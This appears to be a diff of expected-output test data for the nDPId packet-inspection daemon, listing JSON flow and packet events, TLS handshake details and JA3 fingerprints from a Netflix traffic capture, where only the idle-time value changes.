-01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117826,"flow_last_seen":1484319117826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117826,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1484319117826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117826,"pkt":"gCqoTGHM5JjWH70UCABFAABAF8hAAEAGDxPAqAEHNCkeBdABAbshc+whAAAAALAC\/\/8t3QAAAgQFtAEDAwUBAQgKH2X2iwAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117827,"flow_last_seen":1484319117827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1484319117827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117827,"pkt":"gCqoTGHM5JjWH70UCABFAABADR1AAEAGGb7AqAEHNCkeBdACAbuRqNIFAAAAALAC\/\/\/XwQAAAgQFtAEDAwUBAQgKH2X2jAAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6809,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1484319117879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117879,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGPL80KR4FwKgBBwG70AFaPMiyIXPsIqASOJC25AAAAgQFtAQCCAqh\/YpsH2X2iwEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1484319117881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117881,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BiRAAEAGIMPAqAEHNCkeBdABAbshc+wiWjzIs4AQEBUN+QAAAQEICh9l9r+h\/Yps"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1484319117886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117886,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG70ALhlhIJkajSBqASOJCQFwAAAgQFtAQCCAqh\/YptH2X2jAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6813,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1484319117890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117890,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Pr9AAEAG6CfAqAEHNCkeBdACAbuRqNIG4ZYSCoAQEBXnJgAAAQEICh9l9sWh\/Ypt"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117605,"flow_last_seen":1484319117605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117605,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1484319117605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117605,"pkt":"gCqoTGHM5JjWH70UCABFAABArFRAAEAGeobAqAEHNCkeBc\/3Abv7qhZTAAAAALAC\/\/8qUQAAAgQFtAEDAwUBAQgKH2X1uAAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117651,"flow_last_seen":1484319117651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117651,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1484319117651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117651,"pkt":"gCqoTGHM5JjWH70UCABFAABAO7RAAEAG8l7AqAEHNCAW1tAAAbtmeMEgAAAAALAC\/\/8btwAAAgQFtAEDAwUBAQgKH2X15gAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6758,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1484319117664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117664,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG7z\/fOmYqt+6oWVKASOJB9NwAAAgQFtAQCCAqh\/Yo1H2X1uAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6761,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1484319117667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117667,"pkt":"gCqoTGHM5JjWH70UCABFAAA0nQxAAEAGidrAqAEHNCkeBc\/3Abv7qhZUzpmKroAQEBXUQwAAAQEICh9l9fSh\/Yo1"} 
+00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6772,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1484319117703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117703,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG70ABfA575ZnjBIaASOJAZDQAAAgQFtAQCCAq2sSZcH2X15gEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6773,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1484319117704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117704,"pkt":"gCqoTGHM5JjWH70UCABFAAA0fsVAAEAGr1nAqAEHNCAW1tAAAbtmeMEhXwOe+oAQEBVwIwAAAQEICh9l9hi2sSZc"} 
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117826,"flow_last_seen":1484319117826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117826,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1484319117826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117826,"pkt":"gCqoTGHM5JjWH70UCABFAABAF8hAAEAGDxPAqAEHNCkeBdABAbshc+whAAAAALAC\/\/8t3QAAAgQFtAEDAwUBAQgKH2X2iwAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117827,"flow_last_seen":1484319117827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1484319117827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117827,"pkt":"gCqoTGHM5JjWH70UCABFAABADR1AAEAGGb7AqAEHNCkeBdACAbuRqNIFAAAAALAC\/\/\/XwQAAAgQFtAEDAwUBAQgKH2X2jAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6809,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1484319117879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117879,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGPL80KR4FwKgBBwG70AFaPMiyIXPsIqASOJC25AAAAgQFtAQCCAqh\/YpsH2X2iwEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1484319117881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117881,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BiRAAEAGIMPAqAEHNCkeBdABAbshc+wiWjzIs4AQEBUN+QAAAQEICh9l9r+h\/Yps"} 
